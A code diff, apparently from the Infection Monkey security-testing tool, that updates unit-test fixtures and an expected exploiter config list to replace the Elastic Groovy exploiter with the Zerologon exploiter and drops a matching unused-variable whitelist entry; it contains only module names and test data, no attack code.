|
@ -11,7 +11,7 @@ from monkey_island.cc.services.reporting.exploitations.monkey_exploitation impor
|
||||||
|
|
||||||
def test_get_exploits_used_on_node__2_exploits():
|
def test_get_exploits_used_on_node__2_exploits():
|
||||||
exploits = get_exploits_used_on_node(NODE_DICT)
|
exploits = get_exploits_used_on_node(NODE_DICT)
|
||||||
assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"])
|
assert sorted(exploits) == sorted(["Zerologon Exploiter", "Drupal Server Exploiter"])
|
||||||
|
|
||||||
|
|
||||||
def test_get_exploits_used_on_node__duplicate_exploits():
|
def test_get_exploits_used_on_node__duplicate_exploits():
|
||||||
|
|
|
@ -110,9 +110,9 @@ NODE_DICT = {
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"exploitation_result": True,
|
"exploitation_result": True,
|
||||||
"exploiter": "ElasticGroovyExploiter",
|
"exploiter": "ZerologonExploiter",
|
||||||
"info": {
|
"info": {
|
||||||
"display_name": "Elastic search",
|
"display_name": "Zerologon",
|
||||||
"started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
|
"started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
|
||||||
"finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
|
"finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
|
||||||
"vulnerable_urls": [],
|
"vulnerable_urls": [],
|
||||||
|
|
|
@ -186,7 +186,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
|
||||||
],
|
],
|
||||||
"vulnerability": [
|
"vulnerability": [
|
||||||
{"name": "DrupalExploiter", "options": {}},
|
{"name": "DrupalExploiter", "options": {}},
|
||||||
{"name": "ElasticGroovyExploiter", "options": {}},
|
|
||||||
{"name": "HadoopExploiter", "options": {}},
|
{"name": "HadoopExploiter", "options": {}},
|
||||||
{"name": "Struts2Exploiter", "options": {}},
|
{"name": "Struts2Exploiter", "options": {}},
|
||||||
{"name": "WebLogicExploiter", "options": {}},
|
{"name": "WebLogicExploiter", "options": {}},
|
||||||
|
|
|
@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
|
||||||
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
||||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
||||||
|
|
Loading…
Reference in New Issue